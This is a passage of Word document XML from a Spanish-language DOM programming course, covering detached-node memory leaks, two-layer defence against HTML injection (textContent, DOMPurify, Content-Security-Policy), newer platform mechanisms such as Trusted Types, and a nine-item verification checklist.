            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B179F65" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Llamala </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>cincuenta veces</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> desde la consola, guardando las funciones de desmontaje.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544ACC7E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Ejecutá las cincuenta. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>La pantalla queda limpia.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5493DFB4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4. Abrí el panel de memoria, forzá la recolección, tomá una instantánea y filtrá por nodos separados.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47F9E5BD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Los cincuenta </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>div</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> siguen ahí: no se ven, no están en el documento, y ocupan memoria.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58EF6C55" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Hacé clic en cualquier lado y mirá la consola: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>los cincuenta manejadores se ejecutan.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741BEF90" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Eso es lo que hace obligatoria a RN-F01. Y fijate en el detalle más importante: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>en el paso 3 la pantalla se veía perfecta.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ninguna fuga se ve mirando la pantalla.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="316C1753" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc239320016"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.12 — Seguridad y evolución</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="1AC79735" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La defensa contra la inyección de 4.7 tiene </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dos capas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. La primera es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>tu código</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>createElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> por defecto, DOMPurify cuando el HTML es un requisito. Eso es RN-F02.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76008DBD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La segunda es el encabezado </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, que el TPI especifica en su sección 16.5 y que ya viste en la 1.12. Declara de qué orígenes se admite ejecutar scripts, y una política que prohíbe los manejadores en línea </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>neutraliza el ataque del ejemplo aunque tu código tenga el error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ésa es su razón de ser: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>actúa cuando la primera capa falló</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> — y la primera capa falla tarde o temprano, porque la escribe una persona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A826D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc239320017"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tres mecanismos que la plataforma incorporó, y en qué estado están</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3007"/>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="3005"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="2BB8B8E9"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B7A3F53" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Mecanismo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BDC480A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué hace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CC48F42" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>En qué estado está</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="07BB9C2F"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89A85A1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Tipos de confianza</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Trusted Types</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B055A2B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Hacen que el navegador </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">rechace asignaciones directas a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>: todo pasa por una función de saneamiento declarada. Convierte RN-F02 en algo que el navegador impone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6760CD94" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Propuesta del WICG, ya implementada en varios navegadores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="513C420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3635C63" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Element.setHTML()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55DC2D56" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Lleva el saneamiento a la plataforma, para que no haga falta una biblioteca</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AC4213E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>En proceso de estandarización</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="033313B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FBE0626" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>DOM en la sombra</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Shadow DOM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07FEA019" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Crea subárboles aislados, con estilos que no escapan ni entran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E508CB6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Estándar establecido; base de los componentes web del Capítulo 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5987EEAE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Una última precisión, que cierra el arco abierto en 4.2: la interfaz que hoy te ofrece la plataforma —</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>querySelector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>closest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>es sustancialmente mejor que la que motivó a jQuery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Por eso el TPI puede prohibirte el framework: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>la interfaz nativa ya alcanza.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> En 2006 no era cierto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC6094" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc239320018"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.13 — Verificación: el checklist honesto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="7771F6AA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Nueve comprobaciones. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>No son ejercicios: son el criterio de que se entendió.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A10BCFC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparar el HTML original con el DOM actual en una página dinámica y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>explicar cada diferencia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2EF8AC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Contar los hijos de una lista indentada y explicar por qué el número no coincide con los elementos. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6806B241" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Reproducir el bug de la colección viva y corregirlo. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.5.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F1444C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Insertar un dato con marcado usando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y usando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>documentar la diferencia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.6.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D60BE6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Reproducir el ataque y neutralizarlo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>de las dos formas que admite el TPI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.7.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63934CCC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrar manejadores en las tres fases sobre elementos anidados y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>predecir el orden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.8.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F60A93" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementar una lista con delegación y verificar que hay </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>un solo manejador</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.8.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E00626D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Provocar la fuga, confirmarla en el panel de memoria y corregirla con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.9.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCCABD7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Medir la diferencia entre insertar cien elementos uno por uno y con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>(4.10)</w:t>
      </w:r>
    </w:p>
